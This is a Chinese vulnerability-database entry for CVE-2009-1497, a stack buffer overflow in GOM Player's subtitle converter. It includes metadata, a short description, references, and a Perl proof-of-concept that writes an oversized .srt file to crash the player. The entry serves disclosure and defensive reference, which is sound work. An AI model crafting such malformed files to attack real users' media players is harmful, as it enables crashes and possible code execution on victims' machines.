Gomlab Gretech GOM Player .srt文件解析栈溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117554 漏洞类型 缓冲区溢出
发布时间 2009-04-08 更新时间 2009-05-01
CVE编号 CVE-2009-1497 CNNVD-ID CNNVD-200905-018
漏洞平台 Windows CVSS评分 9.3
|漏洞来源
https://www.exploit-db.com/exploits/8370
https://cxsecurity.com/issue/WLB-2009050089
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-018
|漏洞详情
GOMPlayer是在南韩广泛使用的媒体播放器。GOMPlayer在播放多媒体文件时支持显示字幕。具体来说,在处理过程中GOMPlayer使用srt2smi.exe模块将srt转换为smi格式,但这个模块没有正确地执行边界检查。如果用户受骗加载了包含有超长字符串的特制srt文件就可能触发栈溢出,导致执行任意代码。
|漏洞EXP
#!/usr/local/bin/perl

##################################################################
#
#	Title : GOM Player Subtitle Buffer Overflow Vulnerabiltity
#	Discovery by : Bui Quang Minh
#	Tested : GOM Player 2.1.16.6134
#	Reference : Bkis [http://security.bkis.vn/?p=501]
#	PoC : Windows XP (Silently Crash) and Windows Vista, Windows 7.
#	
##################################################################

my $buffer = "A" x 10240 x 4;
my $filename = "gomdos.srt";
open (FILE,">$filename") || die "\nCan't open $file: $!";
print FILE "$buffer";
close (FILE);
print "\nSuccessfully!\n\nPlease try $filename with a video file!\n";

# milw0rm.com [2009-04-08]
|参考资料

来源:BID
名称:34427
链接:http://www.securityfocus.com/bid/34427
来源:BUGTRAQ
名称:20090408[Bkis-06-2009]GOMPlayerSubtitleBufferOverflowVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/502552/100/0/threaded
来源:MILW0RM
名称:8370
链接:http://www.milw0rm.com/exploits/8370
来源:MISC
链接:http://security.bkis.vn/?p=501
来源:SECUNIA
名称:34639
链接:http://secunia.com/advisories/34639
来源:OSVDB
名称:53361
链接:http://osvdb.org/53361